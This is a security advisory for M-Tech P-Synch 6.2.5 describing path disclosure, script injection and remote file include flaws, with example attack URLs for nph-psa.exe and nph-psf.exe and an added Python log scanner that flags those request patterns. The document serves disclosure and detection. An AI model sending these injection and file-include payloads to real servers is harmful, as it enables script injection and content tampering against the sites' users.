Vulnerabilities In P-Synch Password Management
May 30, 2022
Vendor : M-Tech Identity Management Solutions
URL : http://www.psynch.com/
Version : M-Tech P-Synch 6.2.5
Risk : Multiple Vulnerabilities
BID : http://www.securityfocus.com/bid/7740
: http://www.securityfocus.com/bid/7745
: http://www.securityfocus.com/bid/7747


Description:
P-Synch is a total password management solution. It is intended to reduce the cost of ownership of password systems and simultaneously improve the security of password-protected systems. This is done through:
- Password synchronization.
- Enforcing an enterprise-wide password strength policy.
- Allowing authenticated users to reset their own forgotten passwords and enable their locked-out accounts.
- Streamlining help desk call resolution for password resets.
P-Synch is available both for internal use on the corporate intranet and for Internet deployment in B2B and B2C applications.

Path Disclosure Vulnerability:
https://path/to/psynch/nph-psa.exe?lang=
https://path/to/psynch/nph-psf.exe?lang=

Script Injection Vulnerability:
https://path/to/psynch/nph-psf.exe?css=">[VBScript, JScript etc]
https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc]

File Include Vulnerability:
https://path/to/psynch/nph-psf.exe?css=http://somesite/file
https://path/to/psynch/nph-psa.exe?css=http://somesite/file

Solution:
Upgrade to the latest version of P-Synch Password Management.
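
Until the upgrade is in place, web server logs can be checked for the three request patterns listed above. The following is an added example, not part of the original advisory or of P-Synch: it assumes Common Log Format access logs, reads the empty `lang=` literally as printed above, and uses constructed sample entries.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The two CGI programs named in the advisory.
TARGETS = ("nph-psa.exe", "nph-psf.exe")
# Request line inside a Common Log Format entry (the log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that let a css value break out of an HTML attribute.
MARKUP_RE = re.compile(r'["<>]')
# Absolute or protocol-relative URL, i.e. a stylesheet fetched from another host.
EXTERNAL_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:)?//', re.I)

def classify(line):
    """Return the set of advisory patterns matched by one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return set()
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith(TARGETS):
        return set()
    # parse_qs percent-decodes values; keep_blank_values keeps an empty lang=.
    params = parse_qs(url.query, keep_blank_values=True)
    hits = set()
    if any(value == "" for value in params.get("lang", [])):
        hits.add("path-disclosure")
    for value in params.get("css", []):
        if MARKUP_RE.search(value):
            hits.add("script-injection")
        if EXTERNAL_RE.match(value):
            hits.add("file-include")
    return hits

def scan(lines):
    """Return (line number, sorted pattern names) for every flagged entry."""
    flagged = []
    for number, line in enumerate(lines, 1):
        hits = classify(line)
        if hits:
            flagged.append((number, sorted(hits)))
    return flagged

# Constructed sample entries (documentation addresses, not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:00:00:01 +0000] "GET /psynch/nph-psa.exe?lang= HTTP/1.0" 200 512',
    '192.0.2.11 - - [01/Jan/2000:00:00:02 +0000] "GET /psynch/nph-psf.exe?css=%22%3E%3Cb%3Ex HTTP/1.0" 200 900',
    '192.0.2.12 - - [01/Jan/2000:00:00:03 +0000] "GET /psynch/nph-psa.exe?css=http://example.invalid/file HTTP/1.0" 200 900',
    '192.0.2.13 - - [01/Jan/2000:00:00:04 +0000] "GET /psynch/nph-psf.exe?lang=en&css=default.css HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(number, ", ".join(hits))
```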

Credits:
James Bercegay of the GulfTech Security Research Team.